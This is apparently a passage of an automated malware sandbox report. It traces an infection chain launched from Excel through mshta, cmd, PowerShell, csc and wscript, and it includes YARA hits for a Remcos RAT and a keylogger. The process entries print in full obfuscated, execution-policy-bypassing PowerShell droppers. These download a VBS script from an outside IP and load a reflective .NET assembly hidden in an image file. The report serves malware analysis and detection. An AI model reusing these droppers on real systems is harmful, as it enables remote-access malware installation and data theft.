                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                                                                                                                                              Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                                                                                                                                              Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:09:36:47
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                              Imagebase:0x13f3e0000
                                                                                                                                                                                              File size:28'253'536 bytes
                                                                                                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                              Start time:09:37:10
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                              Imagebase:0x13f3c0000
                                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:09:37:14
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                                                                                                                                                                                              Imagebase:0x4a280000
                                                                                                                                                                                              File size:345'088 bytes
                                                                                                                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:09:37:14
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:09:37:18
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"
                                                                                                                                                                                              Imagebase:0x13faa0000
                                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                              Start time:09:37:19
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP"
                                                                                                                                                                                              Imagebase:0x13fe30000
                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                              Start time:09:37:25
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                                                                                                                                                                                              Imagebase:0xff6b0000
                                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                              Start time:09:37:25
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                              Start time:09:37:26
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                              Start time:09:37:30
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                              Imagebase:0x13f1d0000
                                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                              Start time:09:37:33
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                                                                                                                                                                                              Imagebase:0x4aba0000
                                                                                                                                                                                              File size:345'088 bytes
                                                                                                                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                              Start time:09:37:33
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                              Start time:09:37:34
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                                                                                                                                                                                              Imagebase:0x13fac0000
                                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                              Start time:09:37:34
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP"
